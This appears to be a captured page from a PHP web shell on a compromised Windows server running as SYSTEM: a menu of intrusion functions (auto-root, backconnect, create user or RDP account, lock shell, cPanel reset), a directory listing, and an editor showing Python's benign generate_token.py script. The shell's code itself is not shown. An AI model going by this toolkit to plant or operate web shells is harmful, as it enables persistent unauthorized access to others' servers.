Windows NT DGPENSV2LPKMN 10.0 build 14393 (Windows Server 2016) AMD64
Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.3.25
172.16.0.66 | 172.16.0.254
Can't Read [ /etc/named.conf ]
PHP: 7.3.25
User: SYSTEM
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
[ A ] [ C ] [ D ]
C:/laragon/bin/python/python-3.10/Tools/scripts/
[ HOME SHELL ]
Name | Size | Permission
__pycache__ | [ DIR ] | drwxrwxrwx
2to3.py | 101 B | -rw-rw-rw-
abitype.py | 5.64 KB | -rw-rw-rw-
analyze_dxp.py | 4.21 KB | -rw-rw-rw-
byext.py | 3.94 KB | -rw-rw-rw-
byteyears.py | 1.67 KB | -rw-rw-rw-
checkpip.py | 825 B | -rw-rw-rw-
cleanfuture.py | 8.69 KB | -rw-rw-rw-
combinerefs.py | 4.48 KB | -rw-rw-rw-
copytime.py | 689 B | -rw-rw-rw-
crlf.py | 655 B | -rw-rw-rw-
db2pickle.py | 3.68 KB | -rw-rw-rw-
diff.py | 2.26 KB | -rw-rw-rw-
dutree.py | 1.66 KB | -rw-rw-rw-
eptags.py | 1.6 KB | -rw-rw-rw-
find-uname.py | 1.22 KB | -rw-rw-rw-
find_recursionlimit.py | 4.03 KB | -rw-rw-rw-
finddiv.py | 2.56 KB | -rw-rw-rw-
findlinksto.py | 1.09 KB | -rw-rw-rw-
findnocoding.py | 2.99 KB | -rw-rw-rw-
fixcid.py | 10.24 KB | -rw-rw-rw-
fixdiv.py | 14.28 KB | -rw-rw-rw-
fixheader.py | 1.38 KB | -rw-rw-rw-
fixnotice.py | 3.06 KB | -rw-rw-rw-
fixps.py | 923 B | -rw-rw-rw-
generate_opcode_h.py | 2.25 KB | -rw-rw-rw-
generate_stdlib_module_names.p... | 4.7 KB | -rw-rw-rw-
generate_token.py | 7.08 KB | -rw-rw-rw-
get-remote-certificate.py | 2.7 KB | -rw-rw-rw-
google.py | 526 B | -rw-rw-rw-
gprof2html.py | 2.33 KB | -rw-rw-rw-
highlight.py | 9.21 KB | -rw-rw-rw-
ifdef.py | 3.73 KB | -rw-rw-rw-
import_diagnostics.py | 1.01 KB | -rw-rw-rw-
lfcr.py | 664 B | -rw-rw-rw-
linktree.py | 2.46 KB | -rw-rw-rw-
lll.py | 775 B | -rw-rw-rw-
mailerdaemon.py | 8.09 KB | -rw-rw-rw-
make_ctype.py | 2.32 KB | -rw-rw-rw-
md5sum.py | 2.55 KB | -rw-rw-rw-
mkreal.py | 1.66 KB | -rw-rw-rw-
ndiff.py | 3.86 KB | -rw-rw-rw-
nm2def.py | 2.53 KB | -rw-rw-rw-
objgraph.py | 6.01 KB | -rw-rw-rw-
parse_html5_entities.py | 4.01 KB | -rw-rw-rw-
parseentities.py | 1.76 KB | -rw-rw-rw-
patchcheck.py | 10.81 KB | -rw-rw-rw-
pathfix.py | 6.85 KB | -rw-rw-rw-
pdeps.py | 4.07 KB | -rw-rw-rw-
pep384_macrocheck.py | 4.75 KB | -rw-rw-rw-
pickle2db.py | 4.07 KB | -rw-rw-rw-
pindent.py | 17.22 KB | -rw-rw-rw-
ptags.py | 1.34 KB | -rw-rw-rw-
pydoc3.py | 85 B | -rw-rw-rw-
pysource.py | 3.9 KB | -rw-rw-rw-
reindent-rst.py | 293 B | -rw-rw-rw-
reindent.py | 11.7 KB | -rw-rw-rw-
rgrep.py | 1.61 KB | -rw-rw-rw-
run_tests.py | 1.83 KB | -rw-rw-rw-
serve.py | 1.23 KB | -rw-rw-rw-
smelly.py | 5.07 KB | -rw-rw-rw-
stable_abi.py | 20.91 KB | -rw-rw-rw-
suff.py | 536 B | -rw-rw-rw-
texi2html.py | 70.75 KB | -rw-rw-rw-
untabify.py | 1.32 KB | -rw-rw-rw-
update_file.py | 790 B | -rw-rw-rw-
var_access_benchmark.py | 11.92 KB | -rw-rw-rw-
verify_ensurepip_wheels.py | 3.21 KB | -rw-rw-rw-
which.py | 1.71 KB | -rw-rw-rw-
win_add2path.py | 1.68 KB | -rw-rw-rw-
Actions: Delete | Unzip | Zip
Code Editor : generate_token.py
#! /usr/bin/env python3
# This script generates token related files from Grammar/Tokens:
#
#     Doc/library/token-list.inc
#     Include/token.h
#     Parser/token.c
#     Lib/token.py

NT_OFFSET = 256

def load_tokens(path):
    tok_names = []
    string_to_tok = {}
    ERRORTOKEN = None
    with open(path) as fp:
        for line in fp:
            line = line.strip()
            # strip comments
            i = line.find('#')
            if i >= 0:
                line = line[:i].strip()
            if not line:
                continue
            fields = line.split()
            name = fields[0]
            value = len(tok_names)
            if name == 'ERRORTOKEN':
                ERRORTOKEN = value
            string = fields[1] if len(fields) > 1 else None
            if string:
                string = eval(string)
                string_to_tok[string] = value
            tok_names.append(name)
    return tok_names, ERRORTOKEN, string_to_tok

def update_file(file, content):
    try:
        with open(file, 'r') as fobj:
            if fobj.read() == content:
                return False
    except (OSError, ValueError):
        pass
    with open(file, 'w') as fobj:
        fobj.write(content)
    return True


token_h_template = """\
/* Auto-generated by Tools/scripts/generate_token.py */

/* Token types */
#ifndef Py_LIMITED_API
#ifndef Py_TOKEN_H
#define Py_TOKEN_H
#ifdef __cplusplus
extern "C" {
#endif

#undef TILDE   /* Prevent clash of our definition with system macro. Ex AIX, ioctl.h */

%s\
#define N_TOKENS        %d
#define NT_OFFSET       %d

/* Special definitions for cooperation with parser */

#define ISTERMINAL(x)           ((x) < NT_OFFSET)
#define ISNONTERMINAL(x)        ((x) >= NT_OFFSET)
#define ISEOF(x)                ((x) == ENDMARKER)
#define ISWHITESPACE(x)         ((x) == ENDMARKER || \\
                                 (x) == NEWLINE   || \\
                                 (x) == INDENT    || \\
                                 (x) == DEDENT)


PyAPI_DATA(const char * const) _PyParser_TokenNames[]; /* Token names */
PyAPI_FUNC(int) PyToken_OneChar(int);
PyAPI_FUNC(int) PyToken_TwoChars(int, int);
PyAPI_FUNC(int) PyToken_ThreeChars(int, int, int);

#ifdef __cplusplus
}
#endif
#endif /* !Py_TOKEN_H */
#endif /* Py_LIMITED_API */
"""

def make_h(infile, outfile='Include/token.h'):
    tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile)

    defines = []
    for value, name in enumerate(tok_names[:ERRORTOKEN + 1]):
        defines.append("#define %-15s %d\n" % (name, value))

    if update_file(outfile, token_h_template % (
            ''.join(defines),
            len(tok_names),
            NT_OFFSET
        )):
        print("%s regenerated from %s" % (outfile, infile))


token_c_template = """\
/* Auto-generated by Tools/scripts/generate_token.py */

#include "Python.h"
#include "token.h"

/* Token names */

const char * const _PyParser_TokenNames[] = {
%s\
};

/* Return the token corresponding to a single character */

int
PyToken_OneChar(int c1)
{
%s\
    return OP;
}

int
PyToken_TwoChars(int c1, int c2)
{
%s\
    return OP;
}

int
PyToken_ThreeChars(int c1, int c2, int c3)
{
%s\
    return OP;
}
"""

def generate_chars_to_token(mapping, n=1):
    result = []
    write = result.append
    indent = '    ' * n
    write(indent)
    write('switch (c%d) {\n' % (n,))
    for c in sorted(mapping):
        write(indent)
        value = mapping[c]
        if isinstance(value, dict):
            write("case '%s':\n" % (c,))
            write(generate_chars_to_token(value, n + 1))
            write(indent)
            write('    break;\n')
        else:
            write("case '%s': return %s;\n" % (c, value))
    write(indent)
    write('}\n')
    return ''.join(result)

def make_c(infile, outfile='Parser/token.c'):
    tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile)
    string_to_tok['<>'] = string_to_tok['!=']
    chars_to_token = {}
    for string, value in string_to_tok.items():
        assert 1 <= len(string) <= 3
        name = tok_names[value]
        m = chars_to_token.setdefault(len(string), {})
        for c in string[:-1]:
            m = m.setdefault(c, {})
        m[string[-1]] = name

    names = []
    for value, name in enumerate(tok_names):
        if value >= ERRORTOKEN:
            name = '<%s>' % name
        names.append('    "%s",\n' % name)
    names.append('    "<N_TOKENS>",\n')

    if update_file(outfile, token_c_template % (
            ''.join(names),
            generate_chars_to_token(chars_to_token[1]),
            generate_chars_to_token(chars_to_token[2]),
            generate_chars_to_token(chars_to_token[3])
        )):
        print("%s regenerated from %s" % (outfile, infile))


token_inc_template = """\
.. Auto-generated by Tools/scripts/generate_token.py

%s
.. data:: N_TOKENS

.. data:: NT_OFFSET
"""

def make_rst(infile, outfile='Doc/library/token-list.inc'):
    tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile)
    tok_to_string = {value: s for s, value in string_to_tok.items()}

    names = []
    for value, name in enumerate(tok_names[:ERRORTOKEN + 1]):
        names.append('.. data:: %s' % (name,))
        if value in tok_to_string:
            names.append('')
            names.append('   Token value for ``"%s"``.' % tok_to_string[value])
        names.append('')

    if update_file(outfile, token_inc_template % '\n'.join(names)):
        print("%s regenerated from %s" % (outfile, infile))


token_py_template = '''\
"""Token constants."""
# Auto-generated by Tools/scripts/generate_token.py

__all__ = ['tok_name', 'ISTERMINAL', 'ISNONTERMINAL', 'ISEOF']

%s
N_TOKENS = %d
# Special definitions for cooperation with parser
NT_OFFSET = %d

tok_name = {value: name
            for name, value in globals().items()
            if isinstance(value, int) and not name.startswith('_')}
__all__.extend(tok_name.values())

EXACT_TOKEN_TYPES = {
%s
}

def ISTERMINAL(x):
    return x < NT_OFFSET

def ISNONTERMINAL(x):
    return x >= NT_OFFSET

def ISEOF(x):
    return x == ENDMARKER
'''

def make_py(infile, outfile='Lib/token.py'):
    tok_names, ERRORTOKEN, string_to_tok = load_tokens(infile)

    constants = []
    for value, name in enumerate(tok_names):
        constants.append('%s = %d' % (name, value))
    constants.insert(ERRORTOKEN,
        "# These aren't used by the C tokenizer but are needed for tokenize.py")

    token_types = []
    for s, value in sorted(string_to_tok.items()):
        token_types.append('    %r: %s,' % (s, tok_names[value]))

    if update_file(outfile, token_py_template % (
            '\n'.join(constants),
            len(tok_names),
            NT_OFFSET,
            '\n'.join(token_types),
        )):
        print("%s regenerated from %s" % (outfile, infile))


def main(op, infile='Grammar/Tokens', *args):
    make = globals()['make_' + op]
    make(infile, *args)


if __name__ == '__main__':
    import sys
    main(*sys.argv[1:])